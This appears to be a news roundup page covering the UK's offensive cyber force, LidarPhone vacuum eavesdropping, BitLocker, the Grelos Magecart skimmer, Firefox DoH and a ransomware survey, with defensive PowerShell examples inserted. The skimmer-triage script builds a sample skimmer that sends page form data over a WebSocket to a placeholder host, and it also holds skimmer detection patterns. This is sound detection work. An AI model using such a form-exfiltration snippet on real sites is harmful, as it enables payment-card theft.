More stories

  • in

    The UK's new offensive cyber unit takes on organised crime and hostile states

A new offensive force made up of spies, cyber experts and members of the military is already conducting cyber operations to disrupt hostile state activities, terrorists and criminals, the UK government has revealed.
    The new group – known as the National Cyber Force – aims to tackle threats to the UK’s national security such as countering terror plots, as well as supporting UK military operations.
    Prime Minister Boris Johnson told parliament that the new force was already up and running: “I can announce that we have established a National Cyber Force, combining our intelligence agencies and service personnel, which is already operating in cyberspace against terrorism, organised crime and hostile state activity,” he said.
    The National Cyber Force draws together experts from intelligence agency GCHQ, the Ministry of Defence, the Defence Science and Technology Laboratory, and the Secret Intelligence Service – MI6 – which will provide its “expertise in recruiting and running agents alongside its unique ability to deliver clandestine operational technology”.
    GCHQ said that examples of cyber operations could include interfering with a mobile phone to prevent a terrorist from being able to communicate with their contacts, helping to prevent the internet from being used as a platform for serious crimes, or keeping UK military aircraft safe from targeting by hostile weapons systems.
The NCF is separate from the NCSC, another part of GCHQ, which works on defensive UK cyber security.

    Director GCHQ Jeremy Fleming said the National Cyber Force “brings together intelligence and defence capabilities to transform the UK’s ability to contest adversaries in cyber space, to protect the country, its people and our way of life.”
GCHQ said the new force builds on the UK’s existing National Offensive Cyber Programme, including collaboration between GCHQ and the military to carry out cyber operations. The National Cyber Force has been floated by the government several times already; back in 2018 it was reported that the new unit would be 2,000 strong and would have a budget of £250 million.
    There has already been at least some use of cyber attacks or ‘offensive cyber operations’ by the UK: in 2016 the government said it had conducted cyber operations against Daesh and in 2018, it was also revealed the UK had used cyber attacks against ISIS propaganda networks. The UK has also offered its cyber capabilities to NATO.
    The news about the National Cyber Force was part of a broader announcement of a defence review aimed at increasing the use of technology by the armed forces, creating a “single network” to overcome the enemy, the Prime Minister said.
“A soldier in hostile territory will be alerted to a distant ambush by sensors on satellites or drones, instantly transmitting a warning, using Artificial Intelligence to devise the optimal response, and offering an array of options, from summoning an air strike to ordering a swarm attack, by drones or paralysing the enemy with cyber weapons,” Johnson said.
Such an emphasis on cyber operations is not without its critics, however. Because there are no clear rules about what counts as an appropriate response to a cyber attack, there are concerns that the increased use of offensive cyberwarfare capabilities could lead to rapid and hard-to-control escalation in times of conflict, since different nations may be playing by different rules.
And while some argue that advertising cyber capabilities can act as a deterrent to potential attackers, not all are convinced. In a recent speech Ciaran Martin, until recently the chief of the NCSC, said: “In all my operational experience, I saw absolutely nothing to suggest that the existence of Western cyber capabilities, or our willingness to use them, deters attackers.” He has argued for a debate about the
“We risk an acceptance that the acquisition and use of higher end cyber capabilities are a priority, without testing the question about what this means for our own digital environment. We haven’t had this fundamental debate because the national security community and the technological communities are not really talking to each other,” he said.

  • in

    LidarPhone attack converts smart vacuums into microphones

A team of academics this week detailed novel research that turned a smart vacuum cleaner into a microphone capable of recording nearby conversations.
    Named LidarPhone, the technique works by taking the vacuum’s built-in LiDAR laser-based navigational component and converting it into a laser microphone.

    Laser microphones are well-known surveillance tools that were used during the Cold War to record conversations from afar. Intelligence agents pointed lasers at far-away windows to monitor how glass vibrated and decoded the vibrations to decipher conversations taking place inside rooms.
    Academics from the University of Maryland and the National University of Singapore took this same simple concept but applied it to a Xiaomi Roborock vacuum cleaning robot.
    Certain conditions need to be met
    A LidarPhone attack is not straightforward, and certain conditions need to be met. For starters, an attacker would need to use malware or a tainted update process to modify the vacuum’s firmware in order to take control of the LiDAR component.
This is needed because vacuum LiDARs rotate continuously, which limits how many readings of any one surface an attacker can collect.
    Through tainted firmware, attackers would need to stop the vacuum LiDAR from rotating and instead have it focus on one nearby object at a time, from where it could record how its surface vibrates to sound waves.

    In addition, because smart vacuum LiDAR components are nowhere near as accurate as surveillance-grade laser microphones, the researchers also said the collected laser readings would need to be uploaded to the attacker’s remote server for further processing in order to boost the signal and get the sound quality to a state where it can be understood by a human observer.
    Nonetheless, despite all these conditions, researchers said they were successful in recording and obtaining audio data from the test Xiaomi robot’s LiDAR navigational component.
    They tested the LidarPhone attack with various objects, by varying the distance between the robot and the object, and the distance between the sound origin and the object.

Tests focused on recovering spoken numerical values, which the research team said they managed to recover with 90% accuracy.
    But academics said the technique could also be used to identify speakers based on gender or even determine their political orientation from the music played during news shows, captured by the vacuum’s LiDAR.
    No need to panic. Just academic research.
But while the LidarPhone attack sounds like a gross invasion of privacy, users need not panic for the time being. This type of attack depends on many prerequisites that most attackers won’t bother with. There are far easier ways of spying on users than overwriting a vacuum’s firmware to control its laser navigation system, such as tricking the user into installing malware on their phone.
    The LidarPhone attack is merely novel academic research that can be used to bolster the security and design of future smart vacuum robots.
    In fact, the research team’s main recommended countermeasure for smart vacuum cleaning robot makers is to shut down the LiDAR component if it’s not rotating.
    Additional details about the research are available in a research paper titled “Spying with Your Robot Vacuum Cleaner: Eavesdropping via Lidar Sensors.”
The paper, available as a PDF, was presented at the ACM Conference on Embedded Networked Sensor Systems (SenSys 2020) on November 18, 2020, and a recording of the research team’s talk was also published.

  • in

    Windows 10 Expert's Guide: Everything you need to know about BitLocker

    First in a series of hands-on guides.


    If your PC were lost or stolen, you’d probably cringe at the cost of replacing it. But that’s nothing compared to what you’d stand to lose if someone had unfettered access to the data on that device. Even if they can’t sign in using your Windows user account, a thief could boot from a removable device and browse the contents of the system drive with impunity.
    The most effective way to stop that nightmare scenario is to encrypt the entire device so that its contents are only available to you or someone with the recovery key.
    All editions of Windows 10 since version 1511 (released in November 2015) include XTS-AES 128-bit device encryption options that are robust enough to protect against even the most determined attacks. Using management tools, you can increase the encryption strength to XTS-AES 256.
On modern devices, BitLocker also uses the TPM to verify the integrity of the boot components before it releases the encryption key, so tampering with the boot loader or the firmware configuration forces the system into recovery instead of unlocking the drive.
    BitLocker is the brand name that Microsoft uses for the encryption tools available in business editions of Windows (desktop and server). A limited but still effective subset of BitLocker device encryption features are also available in Windows 10 Home editions. Here’s how to make sure your data is protected.
    How does BitLocker work in Windows 10?
    On all devices that are designed for Windows 10 (see the following section for the hardware requirements), device encryption is automatically enabled. Windows Setup automatically creates the necessary partitions and initializes encryption on the operating system drive with a clear key. To complete the encryption process, you must perform one of the following steps:
    Sign in using a Microsoft account that has administrator rights on the device. That action removes the clear key, uploads a recovery key to the user’s OneDrive account, and encrypts the data on the system drive. Note that this process happens automatically and works on any Windows 10 edition.
    Sign in using an Active Directory account on a Windows domain or an Azure Active Directory account. Either configuration requires a business edition of Windows 10 (Pro, Enterprise, or Education), and the recovery key is saved in a location that is available to the domain or AAD administrator.
    If you sign in using a local account on a device running a business edition of Windows 10, you need to use the BitLocker Management tools to enable encryption on available drives.

On self-encrypting solid-state drives that support hardware encryption, Windows 10 will offload the work of encrypting and decrypting data to the drive itself. Note that weaknesses in several vendors’ SSD hardware encryption implementations, first disclosed in November 2018, could expose data even though BitLocker reported the drive as encrypted. In those cases, you’ll need a firmware upgrade for the SSD; until that upgrade is available, you can switch to software encryption using the instructions in this Microsoft Security Advisory: Guidance for configuring BitLocker to enforce software encryption.
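As an added example (not code from the article or from Microsoft), the following PowerShell finds BitLocker volumes that are relying on the SSD’s own encryption engine, applies the policy that advisory (ADV180028) describes so that future encryption is done in software, and then decrypts and re-encrypts an affected volume. It assumes Windows 10 Pro or Enterprise with the BitLocker module, an elevated prompt and a TPM for the operating system drive; the registry value names are the ones the BitLocker policy template writes for the three “Configure use of hardware-based encryption” settings.

```powershell
# Added example: detect SSD (hardware) BitLocker encryption and move the volume to
# software encryption. Not from the article or Microsoft; assumes Windows 10 Pro/Enterprise,
# the BitLocker module, an elevated prompt and a TPM on the OS drive.

function Get-HardwareEncryptedVolume {
    # Get-BitLockerVolume reports EncryptionMethod 'Hardware' when the drive's own
    # engine, not the BitLocker software driver, is doing the encryption.
    Get-BitLockerVolume |
        Where-Object { [string]$_.EncryptionMethod -eq 'Hardware' } |
        Select-Object MountPoint, VolumeType, VolumeStatus, EncryptionMethod
}

function Disable-HardwareEncryptionPolicy {
    # Local-policy equivalent of setting the three "Configure use of hardware-based
    # encryption for ... drives" Group Policy settings to Disabled. Only affects volumes
    # encrypted after this point; existing volumes keep their current method.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\FVE'
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    foreach ($name in 'OSHardwareEncryption', 'FDVHardwareEncryption', 'RDVHardwareEncryption') {
        New-ItemProperty -Path $key -Name $name -Value 0 -PropertyType DWord -Force | Out-Null
    }
}

function Convert-ToSoftwareEncryption {
    # The advisory's workaround: a hardware-encrypted volume has to be fully decrypted
    # and then encrypted again for the software method to take effect. The volume is
    # unprotected in between, so do this on a machine that stays in your custody.
    param([Parameter(Mandatory)][string]$MountPoint)
    $vol = Get-BitLockerVolume -MountPoint $MountPoint
    Disable-BitLocker -MountPoint $MountPoint | Out-Null
    while ([string](Get-BitLockerVolume -MountPoint $MountPoint).VolumeStatus -ne 'FullyDecrypted') {
        Start-Sleep -Seconds 30
    }
    if ([string]$vol.VolumeType -eq 'OperatingSystem') {
        # Seal the key to the TPM and keep a recovery password for when the TPM changes.
        Enable-BitLocker -MountPoint $MountPoint -EncryptionMethod XtsAes256 -TpmProtector -SkipHardwareTest | Out-Null
        Add-BitLockerKeyProtector -MountPoint $MountPoint -RecoveryPasswordProtector | Out-Null
    } else {
        # Data drives cannot use a TPM protector; auto-unlock can be added afterwards.
        Enable-BitLocker -MountPoint $MountPoint -EncryptionMethod XtsAes256 -RecoveryPasswordProtector | Out-Null
    }
    Get-BitLockerVolume -MountPoint $MountPoint |
        Select-Object MountPoint, VolumeStatus, EncryptionMethod, EncryptionPercentage
}

$affected = @(Get-HardwareEncryptedVolume)
if ($affected.Count -eq 0) {
    'No BitLocker volume is using hardware encryption.'
} else {
    $affected | Format-Table -AutoSize
    Disable-HardwareEncryptionPolicy
    foreach ($v in $affected) { Convert-ToSoftwareEncryption -MountPoint $v.MountPoint }
}
```

Run the audit part on its own first: the policy change is harmless on a fleet, but the decrypt-and-re-encrypt step takes as long as a full encryption pass and should be scheduled, not pushed to every machine at once.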
Note that Windows 10 still supports the much older Encrypting File System (EFS). This is a file- and folder-based encryption system that was introduced with Windows 2000. For virtually all modern hardware, BitLocker is a superior choice.
    Hardware requirements
    The most important hardware feature required to support BitLocker Device Encryption is a Trusted Platform Module chip, or TPM. The device also needs to support the Modern Standby feature (formerly known as InstantGo).
    Virtually all devices that were originally manufactured for Windows 10 meet these requirements.
    Managing BitLocker
    For the most part, BitLocker is a set-it-and-forget-it feature. After you enable encryption for a drive, it doesn’t require any maintenance. You can, however, use tools built into the operating system to perform a variety of management tasks.
    The simplest tools are available in the Windows graphical interface, but only if you are running Windows 10 Pro or Enterprise. Open File Explorer, right-click any drive icon, and click Manage BitLocker. That takes you to a page where you can turn BitLocker on or off; if BitLocker is already enabled for the system drive, you can suspend encryption temporarily or back up your recovery key from here. You can also manage encryption on removable drives and on secondary internal drives.

On a system running Windows 10 Home, you’ll find an on/off switch under Settings > Update & Security > Device encryption. A warning message will appear if device encryption hasn’t been enabled by signing in with a Microsoft account.
For a much larger set of tools, open a command prompt and use one of the two built-in BitLocker administrative tools, manage-bde or repair-bde, with one of their available switches. The simplest and most useful of these is manage-bde -status, which displays the encryption status of all available drives. Note that this command works on all editions, including Windows 10 Home.
    For a full list of switches, type manage-bde -? or repair-bde -?
Finally, Windows PowerShell includes a full set of BitLocker cmdlets. Use Get-BitLockerVolume, for example, to see the status of all fixed and removable drives on the current system. For a full listing of available BitLocker cmdlets, see the PowerShell BitLocker documentation page.
    Saving and using a recovery key
    Under normal circumstances, you unlock your drive automatically when you sign in to Windows 10 using an account that’s authorized for that device. If you try to access the system in any other way, such as by booting from a Windows 10 Setup drive or a Linux-based USB boot drive, you’ll be prompted for a recovery key to access the current drive. You might also see a prompt for a recovery key if a firmware update has changed the system in a way that the TPM doesn’t recognize.
    As a system administrator in an organization, you can use a recovery key (manually or with the assistance of management software) to access data on any device that is owned by your organization, even if the user is no longer a part of the organization.
The recovery key is a 48-digit number that unlocks the encrypted drive in those circumstances. Without that key, the data on the drive remains encrypted. If your goal is to reinstall Windows in preparation for recycling a device, you can skip entering the key and the old data will be completely unreadable after setup is complete, provided you also delete the recovery key from wherever it was backed up.
    Your recovery key is stored in the cloud automatically if you enabled device encryption with a Microsoft account. To find the key, go to https://onedrive.com/recoverykey and sign in with the associated Microsoft account. (Note that this option works on a mobile phone.) Expand the listing for any device to see additional details and an option to delete the saved key.

    If you enabled BitLocker encryption by joining your Windows 10 device with an Azure AD account, you’ll find the recovery key listed under your Azure AD profile. Go to Settings > Accounts > Your Info and click Manage My Account. If you’re using a device that’s not registered with Azure AD, go to https://account.activedirectory.windowsazure.com/profile and sign in with your Azure AD credentials.
    Find the device name under the Devices & Activity heading and click Get BitLocker Keys to view the recovery key for that device. Note that your organization must allow this feature for the information to be available to you.
Finally, on business editions of Windows 10, you can print or save a copy of the recovery key and store the file or printout (or both) in a safe place. Use the management tools available in File Explorer to access these options. Use this option if you enabled device encryption with a Microsoft account and you prefer not to have the recovery key available in OneDrive.
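The command-line tools mentioned under “Managing BitLocker” and the recovery-key handling described in this section come together in the following PowerShell, an added example that is not code from the article or from Microsoft. It audits the operating system drive, brings it to a protected state (including the “clear key” state Windows Setup leaves a new device in), and puts the 48-digit recovery password somewhere an administrator can find it. It assumes Windows 10 Pro, Enterprise or Education, an elevated prompt, a TPM, and, for the -ToActiveDirectory switch, a domain-joined PC whose Active Directory schema stores BitLocker recovery information; the output file path is a placeholder.

```powershell
# Added example (not code from the article or Microsoft): audit, enable and escrow
# BitLocker on the OS drive. Assumes Windows 10 Pro/Enterprise/Education, an elevated
# prompt, a TPM, and AD DS with the BitLocker recovery schema for -ToActiveDirectory.

function Get-BitLockerCompliance {
    param([string]$MountPoint = $env:SystemDrive, [string]$RequiredMethod = 'XtsAes256')
    $vol = Get-BitLockerVolume -MountPoint $MountPoint
    $types = @($vol.KeyProtector | ForEach-Object { [string]$_.KeyProtectorType })
    [pscustomobject]@{
        MountPoint          = $vol.MountPoint
        VolumeStatus        = [string]$vol.VolumeStatus
        ProtectionOn        = ([string]$vol.ProtectionStatus -eq 'On')
        EncryptionMethod    = [string]$vol.EncryptionMethod
        MethodMeetsPolicy   = ([string]$vol.EncryptionMethod -eq $RequiredMethod)
        HasTpmProtector     = [bool]($types | Where-Object { $_ -like 'Tpm*' })
        HasRecoveryPassword = ($types -contains 'RecoveryPassword')
    }
}

function Enable-OsDriveProtection {
    param([string]$MountPoint = $env:SystemDrive)
    $state = Get-BitLockerCompliance -MountPoint $MountPoint
    if ($state.VolumeStatus -eq 'FullyDecrypted') {
        # Never encrypted: start with the stronger method and seal the key to the TPM.
        Enable-BitLocker -MountPoint $MountPoint -EncryptionMethod XtsAes256 -TpmProtector -SkipHardwareTest | Out-Null
    } elseif (-not $state.ProtectionOn) {
        # Encrypted but unprotected: the "clear key" state Setup leaves a device in (the key
        # sits on disk) or a suspended volume. Add a TPM protector if needed and resume;
        # resuming discards the clear key.
        if (-not $state.HasTpmProtector) { Add-BitLockerKeyProtector -MountPoint $MountPoint -TpmProtector | Out-Null }
        Resume-BitLocker -MountPoint $MountPoint | Out-Null
    }
    if (-not $state.HasRecoveryPassword) {
        Add-BitLockerKeyProtector -MountPoint $MountPoint -RecoveryPasswordProtector | Out-Null
    }
    Get-BitLockerCompliance -MountPoint $MountPoint
}

function Save-RecoveryPassword {
    param([string]$MountPoint = $env:SystemDrive, [string]$OutFile, [switch]$ToActiveDirectory)
    $vol = Get-BitLockerVolume -MountPoint $MountPoint
    $protectors = @($vol.KeyProtector | Where-Object { [string]$_.KeyProtectorType -eq 'RecoveryPassword' })
    foreach ($p in $protectors) {
        if ($ToActiveDirectory) {
            # Escrow in AD DS under the protector ID that the recovery screen displays.
            Backup-BitLockerKeyProtector -MountPoint $MountPoint -KeyProtectorId $p.KeyProtectorId | Out-Null
        }
        if ($OutFile) {
            # Same 48-digit number the recovery screen asks for; treat the file as a secret.
            @("Device: $env:COMPUTERNAME", "Volume: $($vol.MountPoint)",
              "Identifier: $($p.KeyProtectorId)", "Recovery Key: $($p.RecoveryPassword)") |
                Out-File -FilePath $OutFile -Encoding ASCII -Append
        }
    }
    $protectors | Select-Object KeyProtectorId, RecoveryPassword
}

Enable-OsDriveProtection | Format-List
Save-RecoveryPassword -OutFile "$env:USERPROFILE\Desktop\BitLocker-$env:COMPUTERNAME.txt"
```

On a device that Setup already encrypted with a clear key, the resume path keeps whatever method was used (XTS-AES 128 by default), so MethodMeetsPolicy will stay false; moving such a drive to XTS-AES 256 means decrypting and re-encrypting it, as in the previous example.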
    BitLocker To Go
Removable storage devices need encryption too. That includes USB flash drives as well as the MicroSD cards that can be used in some PCs. That’s where BitLocker To Go comes in.
To turn on BitLocker encryption for a removable drive, you must be running a business edition of Windows 10. You can then unlock that drive on a PC running any edition, including Windows 10 Home.
    As part of the encryption process, you need to set a password that will be used to unlock the drive. You also need to save the recovery key for the drive. (It’s not automatically saved to a cloud account.)
    Finally, you need to choose an encryption mode. Use the New Encryption Mode (XTS-AES) option if you plan to use the device exclusively on Windows 10. Choose Compatible Mode for a drive you might want to open on a device running an earlier version of Windows.
    The next time you insert that device into a Windows PC, you’ll be prompted for the password. Click More Options and select the checkbox to automatically unlock the device if you want easy access to its data on a trusted device that you control.

That option is especially useful if you’re using a MicroSD card for expanded storage capacity on a device such as a Surface Pro. After you sign in, all of your data is immediately available. If you lose the removable drive or it is stolen, its data is inaccessible to the thief.
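The steps in this section (set a password, save the recovery key, pick an encryption mode, optionally auto-unlock) can be scripted with the BitLocker cmdlets. This is an added example rather than code from the article or from Microsoft; it assumes Windows 10 Pro or Enterprise, an elevated prompt, that E: is the removable drive (a placeholder; change it for your drive) and, for auto-unlock, that the operating system drive is itself BitLocker-protected.

```powershell
# Added example (not code from the article or Microsoft): BitLocker To Go from PowerShell.
# Assumes Windows 10 Pro/Enterprise, an elevated prompt, E: as the removable drive
# (placeholder) and, for -AutoUnlock, a BitLocker-protected OS drive.

function Protect-RemovableDrive {
    param(
        [Parameter(Mandatory)][string]$MountPoint,
        [Parameter(Mandatory)][securestring]$Password,
        [Parameter(Mandatory)][string]$RecoveryKeyFile,
        # $true  -> "New encryption mode" (XTS-AES; Windows 10 only)
        # $false -> "Compatible mode" (AES-CBC; also readable on Windows 7 / 8.1)
        [bool]$NewEncryptionMode = $true,
        [switch]$AutoUnlock
    )
    $method = if ($NewEncryptionMode) { 'XtsAes256' } else { 'Aes256' }
    $vol = Get-BitLockerVolume -MountPoint $MountPoint
    if ([string]$vol.VolumeStatus -ne 'FullyDecrypted') {
        throw "$MountPoint is already BitLocker-managed ($($vol.VolumeStatus)); unlock or decrypt it first."
    }
    # The password protector is what you type when the drive is plugged into another PC.
    Enable-BitLocker -MountPoint $MountPoint -EncryptionMethod $method -PasswordProtector -Password $Password | Out-Null
    # Nothing uploads a removable drive's recovery key to OneDrive or AD, so write it out now.
    $updated = Add-BitLockerKeyProtector -MountPoint $MountPoint -RecoveryPasswordProtector
    $rp = $updated.KeyProtector |
        Where-Object { [string]$_.KeyProtectorType -eq 'RecoveryPassword' } | Select-Object -Last 1
    @("Volume: $MountPoint", "Identifier: $($rp.KeyProtectorId)", "Recovery Key: $($rp.RecoveryPassword)") |
        Out-File -FilePath $RecoveryKeyFile -Encoding ASCII
    if ($AutoUnlock) {
        # Stores the unlock key on this PC's encrypted OS drive: no prompt here,
        # password still required on every other machine.
        Enable-BitLockerAutoUnlock -MountPoint $MountPoint | Out-Null
    }
    Get-BitLockerVolume -MountPoint $MountPoint |
        Select-Object MountPoint, VolumeStatus, EncryptionPercentage, EncryptionMethod, AutoUnlockEnabled
}

$pw = Read-Host -Prompt 'Password for the removable drive' -AsSecureString
Protect-RemovableDrive -MountPoint 'E:' -Password $pw `
    -RecoveryKeyFile "$env:USERPROFILE\Documents\BitLockerToGo-E.txt" -NewEncryptionMode $true -AutoUnlock
```

Encryption continues in the background after the function returns; EncryptionPercentage in the output shows how far it has got, and the drive should not be removed until it reaches 100.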

  • in

    New Grelos skimmer variant reveals overlap in Magecart group activities, malware infrastructure

    A new variant of a skimmer has revealed the increasingly muddy waters associated with tracking groups involved in Magecart-style attacks. 

On Wednesday, researchers from RiskIQ described how a new Grelos skimmer shows “increased overlaps” in Magecart infrastructure and groups. This malware, alongside other skimmers, is now being hosted on domain infrastructure used by multiple groups, or is connected to them via WHOIS records, known phishing campaigns and the deployment of other malware, creating crossovers that can be difficult to separate.
    Magecart is an umbrella term used to describe information stealing campaigns and threat actors that specialize in the theft of payment card data from e-commerce websites. 
    Several years ago, well-known brands including British Airways and Ticketmaster became the first major victims of this form of attack, and since then, countless websites have fallen prey to the same technique. 
    The new variant of the Grelos skimmer, malware that has been around since at least 2015 and associated with Magecart groups 1 and 2, is similar to a separate strain described by researcher @AffableKraut in July. This variant is a WebSocket-based skimmer that uses base64 obfuscation to hide its activities. 
    “We believe this skimmer is not directly related to Group 1-2’s activity from 2015-16, but instead a rehash of some of their code,” RiskIQ says. “This version of the skimmer features a loader stage and a skimmer stage, both of which are base64 encoded five times over.”

Following a Magecart attack on Boom! Mobile, RiskIQ examined the links Malwarebytes had established between that attack and the Fullz House group, which loaded malicious JavaScript on the mobile network provider’s site to scrape customer data.
    The domains used in this cyberattack led the team to a cookie and associated skimmer websites, including facebookapimanager[.]com and googleapimanager[.]com.
However, instead of finding the Fullz House skimmer, the researchers uncovered a new Grelos skimmer variant. This strain has a similar base64 encoded loader stage, but with only one layer of encoding; it contains duplicate script tags and spelling mistakes, and includes a dictionary called “translate” that holds the phrases used by the fake payment forms the malware creates. WebSockets are still used for data exfiltration.
    RiskIQ has observed new variants of Magecart-related skimmers reusing code over the past few years. The company says that the Fullz House skimmer has been co-opted by other hacking groups, even leveraging some of the same infrastructure — such as hosting providers — to host other skimmers, including Grelos, which also shares IPs with the Inter skimmer. 
    This, in turn, is creating a “murkiness” when it comes to tracking the activities of separate Magecart groups, many of which are actively launching new attacks against e-commerce companies on a daily basis. 
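The traits RiskIQ names for this family (a loader and skimmer stage wrapped in repeated base64, WebSocket exfiltration, and a “translate” dictionary of fake-form strings) are simple to check for when triaging an inline script pulled from a compromised checkout page. The following PowerShell is an added example, not RiskIQ’s tooling or the skimmer itself: it peels nested base64 layers off a suspect script and reports which of those traits are present. The sample script it runs against is constructed for the demonstration, and the indicator set and scoring threshold are the author’s own choices.

```powershell
# Added example (not RiskIQ's or the skimmer's code): peel base64 layers off a suspect
# script and flag Grelos-style traits. The sample at the bottom is constructed.

function Expand-Base64Layers {
    param([Parameter(Mandatory)][string]$Text, [int]$MaxLayers = 10)
    $current = $Text.Trim()
    $layers = 0
    while ($layers -lt $MaxLayers -and $current -match '^[A-Za-z0-9+/]+={0,2}$' -and ($current.Length % 4) -eq 0) {
        try { $decoded = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($current)) }
        catch { break }
        # A genuine layer decodes to printable text; bytes that merely look like base64 do not.
        if ($decoded -match '[^\x09\x0A\x0D\x20-\x7E]') { break }
        $current = $decoded.Trim()
        $layers++
    }
    [pscustomobject]@{ Layers = $layers; Payload = $current }
}

function Test-SkimmerIndicators {
    param([Parameter(Mandatory)][string]$Script)
    $result = Expand-Base64Layers -Text $Script
    $p = $result.Payload
    $ws  = $p -match 'new\s+WebSocket\s*\(\s*["'']wss?://'            # exfiltration channel
    $tr  = $p -match '\btranslate\s*=\s*\{'                           # fake-form string table
    $frm = $p -match 'document\.forms|getElementsByTagName\s*\(\s*["'']input["'']'
    $dec = $p -match '\batob\s*\('                                    # decodes more stages at runtime
    $score = @($ws, $tr, $frm, $dec, ($result.Layers -ge 2) | Where-Object { $_ }).Count
    [pscustomobject]@{
        Base64Layers        = $result.Layers
        WebSocketExfil      = $ws
        TranslateDictionary = $tr
        FormScrape          = $frm
        RuntimeDecode       = $dec
        Suspicious          = ($score -ge 3)   # threshold chosen for this example
        Payload             = $p
    }
}

# Constructed sample: a tiny "skimmer" wrapped in five base64 layers, as the write-up describes.
$sample = 'var translate={cc:"Card number",cvv:"Security code"};' +
          'var ws=new WebSocket("wss://example.invalid/s");' +
          'ws.onopen=function(){ws.send(btoa(JSON.stringify(document.forms[0])))};'
for ($i = 0; $i -lt 5; $i++) { $sample = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($sample)) }

Test-SkimmerIndicators -Script $sample | Format-List
```

The layer count alone is a useful signal: legitimate page scripts are rarely base64-encoded even once, so anything that unwraps two or more times before it turns into JavaScript deserves a look regardless of what the inner code contains.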

  • in

    Fearing drama, Mozilla opens public consultation before worldwide Firefox DoH rollout

Mozilla today opened a public comment and consultation period on the ways it could enable support for the controversial privacy-centric DNS-over-HTTPS (DoH) protocol inside Firefox.

    The browser maker’s decision to open a rare public consultation period comes after the organization faced criticism last year in the UK for its plans to support DoH inside Firefox.
UK government officials, law enforcement agencies and local internet service providers criticised Mozilla for developing and wanting to roll out DoH, a feature they said could help suspects bypass enterprise firewalls and parental-control blocklists. The browser maker even earned a nomination for an “Internet Villain” award from a UK ISP trade body.
    All last year’s hoopla was caused by DoH, a web protocol developed as an alternative to the classic DNS (Domain Name System).
    DoH works by encrypting DNS queries (which are normally sent out in clear text) and hiding them inside normal-looking HTTPS web traffic.
    When deployed inside browsers like Firefox, the protocol allows users to hide the sites they are accessing from third-party observers like internet service providers and enterprise traffic management solutions.
Although the protocol has many benefits for users’ individual privacy, ISPs and law enforcement agencies spoke out against it, with the loudest and most concerted voices coming from the UK. Some criticism came from US authorities, but it was not on the same level as in the UK, and many US ISPs eventually set up DoH servers of their own.

Nonetheless, the pressure put on Mozilla in the UK bore fruit, and the browser maker eventually backtracked and agreed to delay deploying DoH in the UK.
    Instead, Mozilla enabled DoH for all Firefox users in the US, where the browser maker has been testing the feature at scale since February this year.
    However, Mozilla has always planned to roll out DoH to all of its users across the world.
    The current consultation period is here as a way to give “stakeholders” (to be read as governments and ISPs) a say in the matter and avoid future issues with the DoH rollout.
    Stakeholders have from November 19, 2020, to January 4, 2021, to file their opinions, which Mozilla said it plans to take into consideration as long as they’re reasonable and have the interests of its users in mind.
However, not many things are expected to change. Since the “Internet Villain” episode last year, Mozilla has already addressed most of the DoH criticism. This included:
    Adding a “canary” domain that can be queried on managed networks to force Firefox to disable DoH support and defer to local enterprise policies for DNS management.
    Adding support for additional default DoH providers inside Firefox, besides Cloudflare (the only DoH provider last year).
    Adding an easier section in the Firefox options page to manage DoH settings.
    But regardless of these updates to how DoH now works inside Firefox, Mozilla still wants to hear from companies and governments about issues with DoH before it enables the feature for all users next year.
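Two of the enterprise accommodations listed above can be exercised from a Windows administrator’s side, and the following PowerShell is an added example of doing so (it is not Mozilla’s code or the article’s). Test-DohCanary checks whether the local resolver answers Mozilla’s canary domain, use-application-dns.net, in the way that makes Firefox switch its own DoH off (NXDOMAIN, or an answer with no A/AAAA records); Set-FirefoxDohPolicy writes the enterprise policy file that controls DoH explicitly, which takes precedence over the canary heuristic. It assumes Firefox is installed in the default location and that no other policies.json is in use there, since the function overwrites the file; the resolver hostname and internal domain passed at the end are constructed values.

```powershell
# Added example (not Mozilla's or the article's code): canary check and enterprise
# DoH policy for Firefox on Windows. Assumes the default install path and that
# policies.json may be overwritten.

function Test-DohCanary {
    # Returns $true when this network signals "no DoH": Firefox disables DoH if the
    # canary lookup returns NXDOMAIN or NOERROR with no A/AAAA answer.
    param([string]$Canary = 'use-application-dns.net', [string]$Server)
    $query = @{ Name = $Canary; Type = 'A'; DnsOnly = $true; ErrorAction = 'Stop' }
    if ($Server) { $query.Server = $Server }
    try {
        $answer = @(Resolve-DnsName @query | Where-Object { $_.Type -in 'A', 'AAAA' })
        return ($answer.Count -eq 0)
    } catch {
        # NXDOMAIN (and resolver failures) surface as a terminating error here.
        return $true
    }
}

function Set-FirefoxDohPolicy {
    param(
        [Parameter(Mandatory)][bool]$Enabled,
        [string]$ProviderUrl,
        [string[]]$ExcludedDomains = @(),
        [string]$InstallDir = (Join-Path $env:ProgramFiles 'Mozilla Firefox')
    )
    $doh = [ordered]@{ Enabled = $Enabled; Locked = $true }   # Locked: users cannot override
    if ($ProviderUrl)           { $doh['ProviderURL']     = $ProviderUrl }
    if ($ExcludedDomains.Count) { $doh['ExcludedDomains'] = $ExcludedDomains }
    $policy = @{ policies = @{ DNSOverHTTPS = $doh } }
    $dir = Join-Path $InstallDir 'distribution'
    New-Item -ItemType Directory -Path $dir -Force | Out-Null
    $file = Join-Path $dir 'policies.json'
    # Write UTF-8 without a BOM; Firefox reads the file as plain JSON.
    [IO.File]::WriteAllText($file, ($policy | ConvertTo-Json -Depth 5), [Text.UTF8Encoding]::new($false))
    return $file
}

if (Test-DohCanary) {
    'Resolver blocks the canary: Firefox will fall back to system DNS on this network.'
} else {
    'Canary resolves: Firefox may use DoH here unless policy says otherwise.'
}

# Keep DoH on, but point it at the organisation's own resolver and keep internal names local.
# The provider URL and excluded domain are constructed values.
Set-FirefoxDohPolicy -Enabled $true -ProviderUrl 'https://doh.example.internal/dns-query' -ExcludedDomains @('example.internal')
```

Disabling DoH outright is just Set-FirefoxDohPolicy -Enabled $false; keeping it enabled but pinned to a resolver you operate preserves the privacy benefit on untrusted networks while leaving your own split-horizon names resolvable.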
Apple, Google and Microsoft have also announced plans to support the DoH protocol in their products, and all have learned from the criticism that Mozilla had to deal with last year, deploying enterprise-friendly DoH implementations from the start; Google’s DoH support went live for all Chrome users earlier this year.

  • in

    Survey says Australian companies adopting multi-cloud more likely to pay ransom

    A new survey has revealed Australian organisations that operate multi-cloud infrastructures run a greater risk of being exposed to a ransomware attack and are more likely to pay hackers to retrieve their data in the event of one.
In the Australian edition of its 2020 Global Ransomware Resiliency Report [PDF], Veritas found that only 43% of Australian respondents said their security has kept pace with the growing complexity of their IT environment.
